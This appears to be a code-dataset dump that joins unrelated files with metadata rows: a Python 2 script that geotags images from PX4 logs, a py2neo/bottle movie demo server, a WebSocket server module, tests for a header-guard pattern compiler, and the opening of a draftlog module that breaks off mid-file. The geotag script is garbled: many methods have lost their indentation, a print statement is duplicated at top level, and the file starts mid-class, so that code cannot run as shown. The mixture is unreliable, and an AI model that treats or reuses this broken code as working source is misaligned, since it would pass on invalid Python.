        self.tag_images()

        if self.kml and len(self.tdiff_list) > 0:
            self.gen_kml()

        if len(self.non_processed_files) > 0:
            print '[WARNING] Some images werent processed (', len(self.non_processed_files), 'of', len(self.img_list), '):'
            for elem in self.non_processed_files:
                print '\t', elem
print '\t', elem
@staticmethod
def to_degree(value, loc):
"""
Convert a lat or lon value to degrees/minutes/seconds
:param value: the latitude or longitude value
:param loc: could be ["S", "N"] or ["W", "E"]
:return:
"""
if value < 0:
loc_value = loc[0]
elif value > 0:
loc_value = loc[1]
else:
loc_value = ""
absolute_value = abs(value)
deg = int(absolute_value)
t1 = (absolute_value - deg) * 60
minute = int(t1)
sec = round((t1 - minute) * 60, 5)
return deg, minute, sec, loc_value
    @staticmethod
    def gps_week_seconds_to_datetime(gpsweek, gpsmillis, leapmillis=0):
        """
        Convert a GPS week number plus milliseconds-into-week to a local
        datetime, optionally applying leap milliseconds.
        (Despite the function name, gpsmillis is in MILLISECONDS.)
        :param gpsweek: GPS week count since the GPS epoch (1980-01-06)
        :param gpsmillis: milliseconds elapsed within that week
        :param leapmillis: leap-second correction, in milliseconds
        :return: naive datetime in local time (via utc_to_local)
        """
        datetimeformat = "%Y-%m-%d %H:%M:%S.%f"
        epoch = datetime.datetime.strptime(
            "1980-01-06 00:00:00.000", datetimeformat)
        elapsed = datetime.timedelta(
            days=(gpsweek * 7), milliseconds=(gpsmillis + leapmillis))
        return Main.utc_to_local(epoch + elapsed)
    @staticmethod
    def unix_microseconds_to_datetime(unix_us, offset=0):
        """
        Convert unix microseconds to datetime object, using offset milliseconds if necessary
        :param unix_us: unix timestamp in microseconds
        :param offset: clock offset in MILLISECONDS added to the result
        :return: naive local datetime
        """
        # time in seconds
        # NOTE(review): under Python 2 both divisions are integer floor
        # divisions, so sub-second precision (and sub-second offsets) is
        # discarded here -- confirm that is intended.
        time_s = int(unix_us) / 1000000 + (offset / 1000)
        datetime_from_unix = datetime.datetime.fromtimestamp(time_s)
        return datetime_from_unix
@staticmethod
def utc_to_local(utc_dt):
"""
Convert UTC time in local time
:param utc_dt:
:return:
"""
# use integer timestamp to avoid precision loss
timestamp = calendar.timegm(utc_dt.timetuple())
local_dt = datetime.datetime.fromtimestamp(timestamp)
assert utc_dt.resolution >= datetime.timedelta(microseconds=1)
return local_dt.replace(microsecond=utc_dt.microsecond)
    def gen_kml(self):
        """
        Generate a KML file with keypoints on the locations of the pictures, including height.
        Writes 'GoogleEarth_points.kml' into the output folder, containing one
        Placemark per tagged image plus a red path connecting them.
        :return:
        """
        style_dot = "sn_shaded_dot"
        style_path = "red_path"

        # document skeleton with the two shared styles (dot icon + red line)
        doc = KML.kml(
            KML.Document(
                KML.Name("GPS of the images"),
                KML.Style(
                    KML.IconStyle(
                        KML.scale(0.4),
                        KML.Icon(
                            KML.href(
                                "http://maps.google.com/mapfiles/kml/shapes/shaded_dot.png")
                        ),
                    ),
                    id=style_dot,
                ),
                KML.Style(
                    KML.LineStyle(
                        KML.color('7f0000ff'),
                        KML.width(6),
                        GX.labelVisibility('1'),
                    ),
                    id=style_path
                )
            )
        )

        # create points (labelled on the first point and every fifth one)
        for i, gps in enumerate(self.tagged_gps):
            ii = i + 1
            doc.Document.append(
                KML.Placemark(
                    KML.styleUrl('#{0}'.format(style_dot)),
                    KML.Point(
                        KML.extrude(True),
                        KML.altitudeMode('absolute'),
                        KML.coordinates(
                            "{},{},{}".format(gps.lon, gps.lat, gps.alt))
                    ),
                    KML.name(
                        str(ii)) if ii % 5 == 0 or ii == 1 else KML.name()
                )
            )

        # create the path connecting all points, at absolute altitude
        doc.Document.append(
            KML.Placemark(
                KML.styleUrl('#{0}'.format(style_path)),
                KML.LineString(
                    KML.altitudeMode('absolute'),
                    KML.coordinates(
                        ' '.join(["{},{},{}".format(gps.lon, gps.lat, gps.alt)
                                  for gps in self.tagged_gps])
                    )
                )
            )
        )

        s = etree.tostring(doc)
        file_path = self.output + 'GoogleEarth_points.kml'
        f = open(file_path, 'w')
        f.write(s)
        f.close()

        print '[INFO] KML file generated on:', file_path
def get_closest_datetime_index(self, datetime_list, elem):
"""
Get the closest element between a list of datetime objects and a date
:param datetime_list:
:param elem:
:return:
"""
dlist_len = len(datetime_list)
i = bisect.bisect_left(datetime_list, elem)
# Cleanup of the indices
if i < 0:
i = 0
elif i >= dlist_len:
i = dlist_len - 1
date = datetime_list[i]
diff = abs((date - elem).total_seconds())
if diff > self.time_thresh:
return -1, diff
return i, diff
    def set_gps_location(self, file_name, lat, lng, alt):
        """
        Add the GPS EXIF tags (latitude, longitude, altitude) to an image file.
        :param file_name: path of the image to modify in place
        :param lat: latitude in decimal degrees (negative = south)
        :param lng: longitude in decimal degrees (negative = west)
        :param alt: altitude in metres
        :return:
        """
        lat_deg = self.to_degree(lat, ["S", "N"])
        lng_deg = self.to_degree(lng, ["W", "E"])

        # EXIF stores coordinates as three rationals: here degrees+minutes
        # are folded into a /60 rational and seconds into a /6000 rational
        exiv_lat = (pyexiv2.Rational(lat_deg[0] * 60 + lat_deg[1], 60),
                    pyexiv2.Rational(lat_deg[2] * 100, 6000), pyexiv2.Rational(0, 1))
        exiv_lng = (pyexiv2.Rational(lng_deg[0] * 60 + lng_deg[1], 60),
                    pyexiv2.Rational(lng_deg[2] * 100, 6000), pyexiv2.Rational(0, 1))

        try:
            exiv_image = pyexiv2.ImageMetadata(file_name)
            exiv_image.read()

            exiv_image["Exif.GPSInfo.GPSLatitude"] = exiv_lat
            exiv_image["Exif.GPSInfo.GPSLatitudeRef"] = lat_deg[3]
            exiv_image["Exif.GPSInfo.GPSLongitude"] = exiv_lng
            exiv_image["Exif.GPSInfo.GPSLongitudeRef"] = lng_deg[3]
            exiv_image["Exif.GPSInfo.GPSAltitude"] = pyexiv2.Rational(alt, 1)
            exiv_image["Exif.GPSInfo.GPSAltitudeRef"] = '0'
            exiv_image["Exif.Image.GPSTag"] = 654
            exiv_image["Exif.GPSInfo.GPSMapDatum"] = "WGS-84"
            exiv_image["Exif.GPSInfo.GPSVersionID"] = '2 0 0 0'

            # True preserves existing (non-GPS) metadata while writing
            exiv_image.write(True)
        except Exception as e:
            print '[ERROR]', e
    def load_gps_from_log(self, log_file, offset):
        """
        Load the GPS fixes from a PX4 binary log by shelling out to
        sdlog2_dump.py and parsing its 'MSG GPS:' lines.
        :param log_file: path to the .px4log file
        :param offset: clock offset in milliseconds, forwarded to
                       unix_microseconds_to_datetime
        :return: list of GpsPosition in log order
        """
        gps_list = []
        out = check_output(
            ["python", "sdlog2_dump.py", log_file, "-m GPS", "-v"])

        for line in out.splitlines():
            if not line.startswith("MSG GPS:"):
                continue

            # lines look like "MSG GPS: GPSTime=..., Lat=..., Lon=..., Alt=..."
            vdict = {}
            pairs = re.split(r'[;,:]\s*', line)
            for pair in pairs:
                e = pair.split('=')
                if len(e) == 2:
                    vdict[e[0]] = float(e[1])

            # PX4 GPS.GPSTime is unix time in microseconds
            gps_time = vdict['GPSTime']
            gps_lat = vdict['Lat']
            gps_lon = vdict['Lon']
            gps_alt = vdict['Alt']

            date = self.unix_microseconds_to_datetime(gps_time, offset)
            gps_list.append(GpsPosition(date, gps_lat, gps_lon, gps_alt))

        return gps_list
def get_image_creation_date(self, filename):
exiv_image = pyexiv2.ImageMetadata(filename)
exiv_image.read()
# Prefer DateTime/Original over the other values
if 'Exif.Photo.DateTimeOriginal' in exiv_image:
cdate = exiv_image['Exif.Photo.DateTimeOriginal'].value
return cdate
elif 'Exif.Image.DateTime' in exiv_image:
cdate = exiv_image['Exif.Image.DateTime'].value
return cdate
else:
epoch = os.path.getmtime(filename)
return datetime.datetime.fromtimestamp(epoch)
def load_image_list(self, input_folder, file_type='jpg'):
"""
Load image list from a folder given a file type
:param input_folder:
:param file_type:
:return:
"""
self.img_list = [input_folder + filename for filename in os.listdir(input_folder)
if re.search(r'\.' + file_type + '$', filename, re.IGNORECASE)]
self.img_list = sorted(self.img_list)
return self.img_list
    def tag_images(self):
        """
        Tag every loaded image with the GPS fix closest in time, copying the
        tagged copy (prefixed with a sequence number) into the output folder.
        Images with no fix within the time threshold are collected in
        self.non_processed_files instead.
        :return:
        """
        # NOTE(review): this local is never used -- results accumulate on
        # self.tagged_gps below; confirm and remove.
        tagged_gps = []
        img_size = len(self.img_list)

        print '[INFO] Number of images:', img_size
        print '[INFO] Number of gps logs:', len(self.gps_list)

        dt_list = [x.timestamp for x in self.gps_list]
        img_seq = 1

        for i in xrange(img_size):
            cdate = self.get_image_creation_date(self.img_list[i])
            gps_i, img_tdiff = self.get_closest_datetime_index(dt_list, cdate)

            base_path, filename = os.path.split(self.img_list[i])

            # -1 means no GPS fix within self.time_thresh seconds
            if gps_i == -1:
                self.non_processed_files.append(filename)
                continue

            closest_gps = self.gps_list[gps_i]
            self.tdiff_list.append(img_tdiff)

            if self.verbose:
                msg = "[DEBUG] %s/%s) %s\n\timg %s -> gps %s (%ss)\n\tlat:%s, lon:%s, alt:%s".ljust(60) %\
                      (i + 1, img_size, filename, cdate, closest_gps.timestamp,
                       img_tdiff, closest_gps.lat, closest_gps.lon, closest_gps.alt)
                print msg

            # copy first, then write the EXIF tags into the copy
            output_filename = self.output + str(img_seq) + '_' + filename
            copyfile(self.img_list[i], output_filename)

            self.set_gps_location(
                output_filename, closest_gps.lat, closest_gps.lon, closest_gps.alt)
            self.tagged_gps.append(closest_gps)
            img_seq += 1

        if len(self.tdiff_list) > 0:
            print '[INFO] Mean diff in seconds:', sum(self.tdiff_list) / float(len(self.tdiff_list))
    @staticmethod
    def get_arg():
        """Define and parse the command-line interface.

        :return: dict of parsed arguments (logfile, input, output, threshold,
                 offset, kml, verbose)
        """
        parser = argparse.ArgumentParser(
            description='Geotag script to add GPS info to pictures from PX4 binary log files.'
                        'It uses synchronized time to allocate GPS positions.'
        )
        parser.add_argument(
            '-l', '--logfile', help='PX4 log file containing recorded positions.', required=True
        )
        parser.add_argument(
            '-i', '--input', help='Input folder containing untagged images.', required=True
        )
        parser.add_argument(
            '-o', '--output', help='Output folder to contain tagged images.', required=True
        )
        parser.add_argument(
            '-t', '--threshold', help='Time threshold between the GPS time and the local image time.',
            default=1, required=False, type=float
        )
        parser.add_argument(
            '-of', '--offset', help='Time offset in MILLISECONDS between the GPS time and the local time.',
            default=0, required=False, type=float
        )
        parser.add_argument(
            '-kml', '--kml', help='Save the in KML format the information of all tagged images.',
            required=False, action='store_true'
        )
        parser.add_argument(
            '-v', '--verbose', help='Prints lots of information.',
            required=False, action='store_true'
        )
        args = vars(parser.parse_args())
        return args
if __name__ == "__main__":
m = Main()
| bsd-3-clause | -4,232,421,145,934,824,400 | 31.928571 | 123 | 0.528235 | false | 3.792728 | false | false | false |
nigelsmall/py2neo | demo/moviegraph/server.py | 1 | 2334 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from bottle import get, post, redirect, request, run, static_file, template, TEMPLATE_PATH
from calendar import month_name
from datetime import date
from os import getenv
from os.path import dirname, join as path_join
from py2neo import Graph, watch
from demo.moviegraph.model import Movie, Person, Comment
home = dirname(__file__)
static = path_join(home, "static")
TEMPLATE_PATH.insert(0, path_join(home, "views"))
# Set up a link to the local graph database.
graph = Graph(password=getenv("NEO4J_PASSWORD"))
watch("neo4j.bolt")
@get('/css/<filename:re:.*\.css>')
def get_css(filename):
return static_file(filename, root=static, mimetype="text/css")
@get('/images/<filename:re:.*\.png>')
def get_image(filename):
return static_file(filename, root=static, mimetype="image/png")
@get("/")
def get_index():
""" Index page.
"""
return template("index")
@get("/person/")
def get_person_list():
""" List of all people.
"""
return template("person_list", people=Person.select(graph).order_by("_.name"))
@get("/person/<name>")
def get_person(name):
""" Page with details for a specific person.
"""
person = Person.select(graph, name).first()
movies = [(movie.title, "Actor") for movie in person.acted_in] + \
[(movie.title, "Director") for movie in person.directed]
return template("person", person=person, movies=movies)
@get("/movie/")
def get_movie_list():
""" List of all movies.
"""
return template("movie_list", movies=Movie.select(graph).order_by("_.title"))
@get("/movie/<title>")
def get_movie(title):
""" Page with details for a specific movie.
"""
return template("movie", movie=Movie.select(graph, title).first())
@post("/movie/comment")
def post_movie_comment():
""" Capture comment and redirect to movie page.
"""
today = date.today()
comment_date = "%d %s %d" % (today.day, month_name[today.month], today.year)
comment = Comment(comment_date, request.forms["name"], request.forms["text"])
title = request.forms["title"]
movie = Movie.select(graph, title).first()
comment.subject.add(movie)
graph.create(comment)
redirect("/movie/%s" % title)
if __name__ == "__main__":
run(host="localhost", port=8080, reloader=True)
| apache-2.0 | -523,447,049,300,249,700 | 24.933333 | 90 | 0.655527 | false | 3.432353 | false | false | false |
GoogleChromeLabs/pywebsocket3 | mod_pywebsocket/websocket_server.py | 15 | 11491 | # Copyright 2020, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Standalone WebsocketServer
This file deals with the main module of standalone server. Although it is fine
to import this file directly to use WebSocketServer, it is strongly recommended
to use standalone.py, since it is intended to act as a skeleton of this module.
"""
from __future__ import absolute_import
from six.moves import BaseHTTPServer
from six.moves import socketserver
import logging
import re
import select
import socket
import ssl
import threading
import traceback
from mod_pywebsocket import dispatch
from mod_pywebsocket import util
from mod_pywebsocket.request_handler import WebSocketRequestHandler
def _alias_handlers(dispatcher, websock_handlers_map_file):
"""Set aliases specified in websock_handler_map_file in dispatcher.
Args:
dispatcher: dispatch.Dispatcher instance
websock_handler_map_file: alias map file
"""
with open(websock_handlers_map_file) as f:
for line in f:
if line[0] == '#' or line.isspace():
continue
m = re.match(r'(\S+)\s+(\S+)$', line)
if not m:
logging.warning('Wrong format in map file:' + line)
continue
try:
dispatcher.add_resource_path_alias(m.group(1), m.group(2))
except dispatch.DispatchException as e:
logging.error(str(e))
class WebSocketServer(socketserver.ThreadingMixIn, BaseHTTPServer.HTTPServer):
"""HTTPServer specialized for WebSocket."""
# Overrides SocketServer.ThreadingMixIn.daemon_threads
daemon_threads = True
# Overrides BaseHTTPServer.HTTPServer.allow_reuse_address
allow_reuse_address = True
def __init__(self, options):
"""Override SocketServer.TCPServer.__init__ to set SSL enabled
socket object to self.socket before server_bind and server_activate,
if necessary.
"""
# Share a Dispatcher among request handlers to save time for
# instantiation. Dispatcher can be shared because it is thread-safe.
options.dispatcher = dispatch.Dispatcher(
options.websock_handlers, options.scan_dir,
options.allow_handlers_outside_root_dir)
if options.websock_handlers_map_file:
_alias_handlers(options.dispatcher,
options.websock_handlers_map_file)
warnings = options.dispatcher.source_warnings()
if warnings:
for warning in warnings:
logging.warning('Warning in source loading: %s' % warning)
self._logger = util.get_class_logger(self)
self.request_queue_size = options.request_queue_size
self.__ws_is_shut_down = threading.Event()
self.__ws_serving = False
socketserver.BaseServer.__init__(self,
(options.server_host, options.port),
WebSocketRequestHandler)
# Expose the options object to allow handler objects access it. We name
# it with websocket_ prefix to avoid conflict.
self.websocket_server_options = options
self._create_sockets()
self.server_bind()
self.server_activate()
def _create_sockets(self):
self.server_name, self.server_port = self.server_address
self._sockets = []
if not self.server_name:
# On platforms that doesn't support IPv6, the first bind fails.
# On platforms that supports IPv6
# - If it binds both IPv4 and IPv6 on call with AF_INET6, the
# first bind succeeds and the second fails (we'll see 'Address
# already in use' error).
# - If it binds only IPv6 on call with AF_INET6, both call are
# expected to succeed to listen both protocol.
addrinfo_array = [(socket.AF_INET6, socket.SOCK_STREAM, '', '',
''),
(socket.AF_INET, socket.SOCK_STREAM, '', '', '')]
else:
addrinfo_array = socket.getaddrinfo(self.server_name,
self.server_port,
socket.AF_UNSPEC,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
for addrinfo in addrinfo_array:
self._logger.info('Create socket on: %r', addrinfo)
family, socktype, proto, canonname, sockaddr = addrinfo
try:
socket_ = socket.socket(family, socktype)
except Exception as e:
self._logger.info('Skip by failure: %r', e)
continue
server_options = self.websocket_server_options
if server_options.use_tls:
if server_options.tls_client_auth:
if server_options.tls_client_cert_optional:
client_cert_ = ssl.CERT_OPTIONAL
else:
client_cert_ = ssl.CERT_REQUIRED
else:
client_cert_ = ssl.CERT_NONE
socket_ = ssl.wrap_socket(
socket_,
keyfile=server_options.private_key,
certfile=server_options.certificate,
ca_certs=server_options.tls_client_ca,
cert_reqs=client_cert_)
self._sockets.append((socket_, addrinfo))
def server_bind(self):
"""Override SocketServer.TCPServer.server_bind to enable multiple
sockets bind.
"""
failed_sockets = []
for socketinfo in self._sockets:
socket_, addrinfo = socketinfo
self._logger.info('Bind on: %r', addrinfo)
if self.allow_reuse_address:
socket_.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
socket_.bind(self.server_address)
except Exception as e:
self._logger.info('Skip by failure: %r', e)
socket_.close()
failed_sockets.append(socketinfo)
if self.server_address[1] == 0:
# The operating system assigns the actual port number for port
# number 0. This case, the second and later sockets should use
# the same port number. Also self.server_port is rewritten
# because it is exported, and will be used by external code.
self.server_address = (self.server_name,
socket_.getsockname()[1])
self.server_port = self.server_address[1]
self._logger.info('Port %r is assigned', self.server_port)
for socketinfo in failed_sockets:
self._sockets.remove(socketinfo)
def server_activate(self):
"""Override SocketServer.TCPServer.server_activate to enable multiple
sockets listen.
"""
failed_sockets = []
for socketinfo in self._sockets:
socket_, addrinfo = socketinfo
self._logger.info('Listen on: %r', addrinfo)
try:
socket_.listen(self.request_queue_size)
except Exception as e:
self._logger.info('Skip by failure: %r', e)
socket_.close()
failed_sockets.append(socketinfo)
for socketinfo in failed_sockets:
self._sockets.remove(socketinfo)
if len(self._sockets) == 0:
self._logger.critical(
'No sockets activated. Use info log level to see the reason.')
def server_close(self):
"""Override SocketServer.TCPServer.server_close to enable multiple
sockets close.
"""
for socketinfo in self._sockets:
socket_, addrinfo = socketinfo
self._logger.info('Close on: %r', addrinfo)
socket_.close()
def fileno(self):
"""Override SocketServer.TCPServer.fileno."""
self._logger.critical('Not supported: fileno')
return self._sockets[0][0].fileno()
def handle_error(self, request, client_address):
"""Override SocketServer.handle_error."""
self._logger.error('Exception in processing request from: %r\n%s',
client_address, traceback.format_exc())
# Note: client_address is a tuple.
def get_request(self):
"""Override TCPServer.get_request."""
accepted_socket, client_address = self.socket.accept()
server_options = self.websocket_server_options
if server_options.use_tls:
# Print cipher in use. Handshake is done on accept.
self._logger.debug('Cipher: %s', accepted_socket.cipher())
self._logger.debug('Client cert: %r',
accepted_socket.getpeercert())
return accepted_socket, client_address
def serve_forever(self, poll_interval=0.5):
"""Override SocketServer.BaseServer.serve_forever."""
self.__ws_serving = True
self.__ws_is_shut_down.clear()
handle_request = self.handle_request
if hasattr(self, '_handle_request_noblock'):
handle_request = self._handle_request_noblock
else:
self._logger.warning('Fallback to blocking request handler')
try:
while self.__ws_serving:
r, w, e = select.select(
[socket_[0] for socket_ in self._sockets], [], [],
poll_interval)
for socket_ in r:
self.socket = socket_
handle_request()
self.socket = None
finally:
self.__ws_is_shut_down.set()
def shutdown(self):
"""Override SocketServer.BaseServer.shutdown."""
self.__ws_serving = False
self.__ws_is_shut_down.wait()
# vi:sts=4 sw=4 et
| bsd-3-clause | -6,413,652,060,124,584,000 | 39.319298 | 79 | 0.599861 | false | 4.576264 | false | false | false |
cgmb/guardonce | tests/test_pattern_compiler.py | 1 | 9953 | # -*- coding: utf-8 -*-
# Copyright (C) 2016-2017 Cordell Bloor
# Published under the MIT License
import os
from nose.tools import *
from guardonce.pattern_compiler import *
def windows_only(f):
"""Only execute on windows systems"""
f.__test__ = os.name == "nt"
return f
def unix_only(f):
"""Only execute on unix systems"""
f.__test__ = os.name == "posix"
return f
class Context:
pass
def test_name():
pattern = 'name'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'Match_h')
def test_path():
pattern = 'path'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','Match.h')
assert_equals(createGuard(ctx), 'src_Match_h')
def test_path_no_arg_with_filter():
'''Bug #19'''
pattern = 'path | upper'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','Match.h')
assert_equals(createGuard(ctx), 'SRC_MATCH_H')
def test_path_arg():
pattern = 'path 1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'widgets_Match_h')
def test_path_big_arg():
pattern = 'path 10'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'src_widgets_Match_h')
def test_path_zero_arg():
pattern = 'path 0'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'Match_h')
def test_path_negative_arg():
pattern = 'path -1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'widgets_Match_h')
def test_path_negative_big_arg():
pattern = 'path -2'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = 'Match.h'
assert_equals(createGuard(ctx), 'Match_h')
@unix_only
def test_path_absolute_path():
pattern = 'path -1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = '/dev/null'
assert_equals(createGuard(ctx), 'null')
@windows_only
def test_path_absolute_path_windows():
pattern = 'path -1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = 'C:\Program Files (x86)\Match.h'
assert_equals(createGuard(ctx), 'Match_h')
@raises(ParserError)
def test_path_bad_arg():
pattern = 'path lkj'
createGuard = compile_pattern(pattern)
def test_parents_arg():
pattern = 'path | parents 1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'widgets_Match_h')
@raises(ParserError)
def test_parents_missing_arg():
pattern = 'path parents'
createGuard = compile_pattern(pattern)
def test_parents_big_arg():
pattern = 'path | parents 10'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'src_widgets_Match_h')
def test_parents_zero_arg():
pattern = 'path | parents 0'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'Match_h')
def test_parents_negative_arg():
pattern = 'path | parents -1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'widgets_Match_h')
def test_parents_negative_big_arg():
pattern = 'path | parents -2'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = 'Match.h'
assert_equals(createGuard(ctx), 'Match_h')
@raises(ParserError)
def test_parents_bad_arg():
pattern = 'path | parents lkj'
createGuard = compile_pattern(pattern)
@unix_only
def test_parents_absolute_path():
pattern = 'path | parents -1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = '/dev/null'
assert_equals(createGuard(ctx), 'null')
@windows_only
def test_parents_absolute_path_windows():
pattern = 'path | parents -1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = 'C:\Program Files (x86)\Match.h'
assert_equals(createGuard(ctx), 'Match_h')
def test_upper():
pattern = 'name | upper'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'MATCH_H')
def test_lower():
pattern = 'name | lower'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'match_h')
def test_snake():
pattern = 'name | snake'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'MatchFactory.h'
assert_equals(createGuard(ctx), 'match_factory_h')
def test_snake_acronym():
pattern = 'name | snake'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'MatchHTTPFactory.h'
assert_equals(createGuard(ctx), 'match_http_factory_h')
def test_snake_single_letter_word():
pattern = 'name | snake'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'BreakAStick.h'
assert_equals(createGuard(ctx), 'break_a_stick_h')
def test_snake_path():
pattern = 'path 1 | snake'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('Code','CaptureContext.h')
assert_equals(createGuard(ctx), 'code_capture_context_h')
def test_snake_symbols():
pattern = 'name | snake | raw'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Micro$oftWord.h'
assert_equals(createGuard(ctx), 'micro$oft_word.h')
def test_pascal():
pattern = 'name | pascal'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'match_factory.h'
assert_equals(createGuard(ctx), 'MatchFactory_h')
def test_prepend():
pattern = 'name | prepend __'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), '__Match_h')
def test_append():
pattern = 'name | append __'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'Match_h__')
def test_surround():
pattern = 'name | surround __'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), '__Match_h__')
def test_remove():
pattern = 'name | remove atch'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'M_h')
def test_replace():
pattern = 'name | replace M W'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'Watch_h')
def test_replace_multiple_characters():
pattern = 'name | replace bunny teapot'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'bunny.h'
assert_equals(createGuard(ctx), 'teapot_h')
def test_replace_with_whitespace():
pattern = "name | replace a ' ' | raw"
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'M tch.h')
def test_replace_with_empty_string():
pattern = "name | replace a '' | raw"
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'Mtch.h')
@raises(ParserError)
def test_replace_with_unclosed_single_quote():
pattern = "name | replace a ' "
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_replace_with_unclosed_double_quote():
pattern = 'name | replace a " '
createGuard = compile_pattern(pattern)
def test_raw():
pattern = 'name | raw'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'Match.h')
@raises(ParserError)
def test_raw_not_last():
pattern = 'name | raw | upper'
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_empty_pattern():
pattern = ''
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_does_not_start_with_source():
pattern = 'upper'
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_replace_insufficient_args():
pattern = 'name | replace M'
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_replace_insufficient_args_into_pipe():
pattern = 'name | replace M | upper'
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_replace_too_many_args():
pattern = 'name | replace M J K'
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_replace_too_many_args_into_pipe():
pattern = 'name | replace M J K | upper'
createGuard = compile_pattern(pattern)
@raises(ParserError)
def test_bad_arg():
pattern = 'name upper'
createGuard = compile_pattern(pattern)
def test_arg_single_quote():
pattern = "name | replace '|' W"
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = '|.h'
assert_equals(createGuard(ctx), 'W_h')
def test_arg_double_quote():
pattern = 'name | replace "|" W'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = '|.h'
assert_equals(createGuard(ctx), 'W_h')
@raises(ParserError)
def test_missing_filter():
pattern = 'name |'
createGuard = compile_pattern(pattern)
| mit | -5,455,985,354,004,510,000 | 27.682997 | 61 | 0.658294 | false | 3.357962 | true | false | false |
kepoorhampond/python-draftlog | draftlog/lcs.py | 1 | 1104 | """
LCS: Line Count Stream
"""
from draftlog.logdraft import LogDraft
from draftlog.drafter import Drafter
import os
import subprocess
import sys
"""
An object inserted into "sys.stdout" in order to
keep track of how many lines have been logged.
"""
class LineCountStream(object):
def __init__(self):
self.data = ""
self.stdout = sys.stdout
self.lines = 1
self.logs = 0
self.editing = False
# Reads the command "tput lines" if valid
try:
